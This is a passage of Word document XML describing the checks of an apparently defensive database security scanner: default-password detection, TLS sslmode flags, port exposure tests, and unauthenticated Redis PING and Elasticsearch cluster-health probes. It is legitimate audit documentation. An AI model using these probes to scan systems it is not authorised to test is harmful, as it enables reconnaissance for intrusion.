        <w:t xml:space="preserve">If the password matches a default word or matches the username, raises a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>CRITICAL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> finding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
        </w:rPr>
        <w:t>TLS / Encryption Enforcement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Inspects query parameters for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sslmode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ssl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>tls</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Flags </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sslmode=disable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sslmode=allow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>HIGH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> severity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Flags connection strings lacking an explicit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sslmode=require</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>MEDIUM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> severity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
        </w:rPr>
        <w:t>Network Socket Accessibility</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attempts a non-blocking TCP socket connection to the target port with a configurable timeout (default: 4 seconds). If the port accepts connections and the host is not a loopback address, raises a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>HIGH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> severity finding for direct internet exposure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
        </w:rPr>
        <w:t>Unauthenticated Protocol Probes (Redis &amp; Elasticsearch)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Redis PING Probe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Connects to port 6379 and transmits the RESP protocol payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>*1\r\n$4\r\nPING\r\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. If the server responds with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>+PONG</w:t>
      </w:r>
      <w:r>
        <w:t>, it confirms the server is unauthenticated, allowing arbitrary remote code execution (RCE) and memory key dumps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Elasticsearch Cluster Health Probe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Transmits an HTTP request to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>http://&lt;host&gt;:9200/_cluster/health</w:t>
      </w:r>
      <w:r>
        <w:t>. If the cluster responds with HTTP 200 containing cluster status, it confirms unauthenticated cluster access.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